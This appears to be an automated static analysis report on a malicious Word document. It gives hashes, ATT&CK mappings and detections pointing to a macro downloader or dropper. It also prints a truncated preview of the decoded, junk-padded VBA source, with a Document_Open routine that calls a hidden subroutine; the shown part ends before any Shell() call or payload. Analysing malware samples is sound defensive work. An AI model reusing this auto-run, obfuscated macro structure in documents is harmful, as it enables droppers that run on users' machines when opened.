Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd25d6b360603971…

MALICIOUS

Office (OLE)

184.5 KB Created: 2017-07-12 00:55:00 Authoring application: Microsoft Office Word First seen: 2020-08-10
MD5: 579b802b01e702500fdac1b331b9cb15 SHA-1: fdcc44f37005c5f3162f788adb7b4a2009160c72 SHA-256: cd25d6b360603971988ed44d51fa5078bf0d0cd25033a20a1b4c801c8087bdbf
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that triggers obfuscated code. Critical heuristics indicate the use of Shell() calls, strongly suggesting the execution of arbitrary commands or the download of additional payloads. The obfuscated nature of the VBA script prevents a detailed analysis of its exact actions, but its presence and the Shell() call are indicative of a downloader or dropper.

Heuristics 5

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 112416 bytes
SHA-256: 6b9a9bc570a615424153b0a968bca8c4e103ea7939ef2bc8875dcdd979a95a52
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim KUI6FSl
KUI6FSl = Abs(40)
Dim STEsUCt, qzRF4vgf
STEsUCt = 1.3
qzRF4vgf = 1 / Cos(STEsUCt)
Dim ly2EX9, Qp2uQ
ly2EX9 = Array("hBt1w9Ul", "AIN8pQs")
Qp2uQ = ly2EX9(1)
Dim OEJxsoLwF, ms1ULmC
OEJxsoLwF = Array("f2RYgnO1", "xyLzTM8r", "nZyMn")
ms1ULmC = OEJxsoLwF(2)
Dim UNLdfm8, XlSG6CHI
UNLdfm8 = Array("Kxyv19d6i", "Cj2de")
XlSG6CHI = UNLdfm8(0)
Dim X2Qr6fa, XlPy5uV
X2Qr6fa = Array("vxw0DAs", "D9g1d", "IYDQSO8J")
XlPy5uV = X2Qr6fa(2)
Dim aNuWS, on7vNa
aNuWS = Array("EJRaW8x0u", "q4une")
on7vNa = aNuWS(0)
Dim y7c54ir, f0U8LEF5
y7c54ir = Array("hybDOCst")
f0U8LEF5 = y7c54ir(0)
Dim Rs74bCA
Rs74bCA = 4 * Atn(1)
tyg4SEu = 600 + 28
If tyg4SEu > -1368 + 1384 Then
r
End If
End Sub
Sub Document_Close()
Dim grzHo, ZgGWqL7UK
grzHo = Array("sU1pqbT", "dIeRnol", "ceYmr7LgW")
ZgGWqL7UK = grzHo(0)
Dim CBCczOYZ, O7NaTX5
CBCczOYZ = Array("MDKUkHy")
O7NaTX5 = CBCczOYZ(0)
Dim CJz2LuR, rAENWhMgG
CJz2LuR = Array("L4wLO")
rAENWhMgG = CJz2LuR(0)
Dim E8tV1, RDnHUYFK0
E8tV1 = Array("marI1x7s", "FfdR9v")
RDnHUYFK0 = E8tV1(0)
Dim g9H5plDn
g9H5plDn = Abs(92)
Dim UQTXVSp
UQTXVSp = 4 * Atn(1)
Dim YAgCx
YAgCx = 4 * Atn(1)
End Sub

Attribute VB_Name = "hvPuz2b"
Sub r()
Dim GTwa76P, Wnm92
GTwa76P = 1.3
Wnm92 = 1 / Cos(GTwa76P)
Dim yS6F0
yS6F0 = Abs(52)
Dim qepsU, G7gUb
qepsU = Array("R1vyC6O", "Gd2TZMybS")
G7gUb = qepsU(0)
Dim f2FiNZxl, ezO52r
f2FiNZxl = 1.3
ezO52r = 1 / Cos(f2FiNZxl)
Dim v0rLDFZG4, ywxkK
v0rLDFZG4 = 1.3
ywxkK = 1 / Cos(v0rLDFZG4)
Dim YGM7l0, U5UTiCSp
YGM7l0 = 1.3
U5UTiCSp = 1 / Cos(YGM7l0)
Dim ALfAP, qJr6HI4cD
ALfAP = Array("cWY5s", "Xo6CbB", "V2rZ1")
qJr6HI4cD = ALfAP(0)
Dim MShHW6, t8t4R
MShHW6 = Array("hQkMebfI0", "uoFIsw")
t8t4R = MShHW6(1)
Dim AMOuZ52
AMOuZ52 = Abs(56)
Dim tQEwIb, OmrE2
tQEwIb = 1.3
OmrE2 = 1 / Cos(tQEwIb)
Dim d8guMlU, Nq4bSBR
d8guMlU = Array("XJfR5X")
Nq4bSBR = d8guMlU(0)
Dim pslKrhi1k, NXHVD9B
pslKrhi1k = Array("SHhLX2Az", "ZVYG6p")
NXHVD9B = pslKrhi1k(1)
Dim uqQEP
uqQEP = Abs(73)
Dim gMtDFoie
gMtDFoie = 4 * Atn(1)
Dim hiYAxog, Sf6HP
hiYAxog = Array("X0emxXD", "ALlwQ9", "dh1kIz3W")
Sf6HP = hiYAxog(0)
Dim yj3GDv6M, tn0eNUt
yj3GDv6M = Array("rxt0Di6")
tn0eNUt = yj3GDv6M(0)
Dim DcQyOgk
DcQyOgk = Abs(55)
Dim CxuC2tDe, tqtgRwI8z
CxuC2tDe = 1.3
tqtgRwI8z = 1 / Cos(CxuC2tDe)
Dim MjQ4ek5O
MjQ4ek5O = 4 * Atn(1)
Dim jxpJ6CG, J3dKhP6
jxpJ6CG = Array("nxQZcXOoL")
J3dKhP6 = jxpJ6CG(0)
Dim x2jzLY, jJtHxfNgB
x2jzLY = Array("jf2Rs0gJl", "oCGjV2")
jJtHxfNgB = x2jzLY(0)
Dim NSFp8, fCEfVdy
NSFp8 = Array("stoxHjpk7")
fCEfVdy = NSFp8(0)
Dim b0YscGkUt
b0YscGkUt = 4 * Atn(1)
Dim oITcCQbV7, jeTn1
oITcCQbV7 = Array("E6eYL5kl", "GJOLxMc", "STfpZLbr")
jeTn1 = oITcCQbV7(0)
Dim GLsBbKloI
GLsBbKloI = 4 * Atn(1)
Dim jkfDwy, o8dVE0
jkfDwy = Array("xjYgVP", "knOHk7RX", "TOVDhcUX")
o8dVE0 = jkfDwy(0)
Dim R7bUzK
R7bUzK = 4 * Atn(1)
Dim R4qR2NxZ, ThDKAa
R4qR2NxZ = Array("d9Js1G", "dCQPzW", "FdO3ys8ie")
ThDKAa = R4qR2NxZ(0)
Dim fvblZeiX, lTFjxbv
fvblZeiX = Array("fvweBdAmT", "eDcG3r")
lTFjxbv = fvblZeiX(1)
Dim aOUgI, AzZgw0fT4
aOUgI = Array("XoqO43m", "o893BTu", "ZxJaLtO")
AzZgw0fT4 = aOUgI(0)
Dim oYIev, alXqmQ9
oYIev = Array("XBw7qmtA3")
alXqmQ9 = oYIev(0)
Dim qST6xw4
qST6xw4 = 4 * Atn(1)
Dim ogD8GQ7, wLCsEj1a
ogD8GQ7 = Array("scbzV9XhA")
wLCsEj1a = ogD8GQ7(0)
Dim SvRwkBJS9, pgBvoM
SvRwkBJS9 = 1.3
pgBvoM = 1 / Cos(SvRwkBJS9)
Dim F8aNA45E
F8aNA45E = Abs(52)
Dim z3Sk0dxpL, AslcIZ
z3Sk0dxpL = Array("rBI4GtHJ0")
AslcIZ = z3Sk0dxpL(0)
Dim WkdYwD2, toBVsCe
WkdYwD2 = 1.3
toBVsCe = 1 / Cos(WkdYwD2)
Dim jmkQfDI9, St801C3ke
jmkQfDI9 = Array("wtD5PLf", "oem7jz9")
St801C3ke = jmkQfDI9(1)
Dim SzisCWvI, g1nWc
SzisCWvI = Array("do1LCOJN", "PUsxPBX7", "hry4J")
g1nWc = SzisCWvI(2)
Dim aNqwp2UGH, vySrYp
aNqw
... (truncated)